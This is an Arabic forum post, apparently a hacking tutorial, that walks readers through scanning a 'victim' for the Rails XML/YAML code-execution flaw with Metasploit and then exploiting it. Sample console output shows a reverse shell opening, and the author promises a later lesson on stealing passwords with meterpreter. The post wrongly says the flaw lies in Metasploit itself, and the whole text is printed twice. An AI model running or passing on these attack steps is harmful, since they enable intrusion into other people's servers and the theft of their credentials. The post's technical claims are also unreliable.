اسطورة سيئون
Administrator
اليوم سوف اتحدث عن ثغره في برنامج الميتاسبلويت لاختراق انظمة الويندوز واللينكس والثغره تكمن في لغة البرمجه ruby
وطبعا برنامج الميتاسبلويت مصنوع من لغة البرمجه ruby ...خطوات واوامرلاكشاف الثغره:
msf> use auxiliary/scanner/http/rails_xml_yaml_scanner
msf auxiliary(rails_xml_yaml_scanner) > set RHOSTS (اي بي الضحيه)
msf auxiliary(rails_xml_yaml_scanner) > set RPORT 80
msf auxiliary(rails_xml_yaml_scanner) > set THREADS 128
msf auxiliary(rails_xml_yaml_scanner) > run
رح تشوف في برنامج الميتاسبلويت كالتالي
اذا شفت في الصوره :
[+] 192.168.0.4:80 is likely vulnerable due to a 500 reply for invalid YAML
االان ارويكم كيف تستغلوا الثغره ruby في برنامج المتياسبوليت عند الضحيه: الاوامر للاختراقه
msf> use exploit/multi/http/rails_xml_yaml_code_exec
msf exploit(rails_xml_yaml_code_exec) > set RHOST 192.168.0.4
msf exploit(rails_xml_yaml_code_exec) > set RPORT 80
msf exploit(rails_xml_yaml_code_exec) > exploit
[*] Reloading module...
[*] Started reverse handler on 192.168.0.4:4444
[*] Sending Railsv3 request to 192.168.0.4:80...
[*] Sending Railsv2 request to 192.168.0.4:80...
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:53719) at 2013-02-4 03:07:54 -0600
ورح الان يفتح shell بيني وبين الضحيه والدرس القادم ان شاء الله رح ارويكم كيف تسرقوا الباسوردات عبر meterpreter
تحياتي لكم
اسطورة سيئون
وطبعا برنامج الميتاسبلويت مصنوع من لغة البرمجه ruby ...خطوات واوامرلاكشاف الثغره:
msf> use auxiliary/scanner/http/rails_xml_yaml_scanner
msf auxiliary(rails_xml_yaml_scanner) > set RHOSTS (اي بي الضحيه)
msf auxiliary(rails_xml_yaml_scanner) > set RPORT 80
msf auxiliary(rails_xml_yaml_scanner) > set THREADS 128
msf auxiliary(rails_xml_yaml_scanner) > run
رح تشوف في برنامج الميتاسبلويت كالتالي
اذا شفت في الصوره :
[+] 192.168.0.4:80 is likely vulnerable due to a 500 reply for invalid YAML
االان ارويكم كيف تستغلوا الثغره ruby في برنامج المتياسبوليت عند الضحيه: الاوامر للاختراقه
msf> use exploit/multi/http/rails_xml_yaml_code_exec
msf exploit(rails_xml_yaml_code_exec) > set RHOST 192.168.0.4
msf exploit(rails_xml_yaml_code_exec) > set RPORT 80
msf exploit(rails_xml_yaml_code_exec) > exploit
[*] Reloading module...
[*] Started reverse handler on 192.168.0.4:4444
[*] Sending Railsv3 request to 192.168.0.4:80...
[*] Sending Railsv2 request to 192.168.0.4:80...
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:53719) at 2013-02-4 03:07:54 -0600
ورح الان يفتح shell بيني وبين الضحيه والدرس القادم ان شاء الله رح ارويكم كيف تسرقوا الباسوردات عبر meterpreter
تحياتي لكم
اسطورة سيئون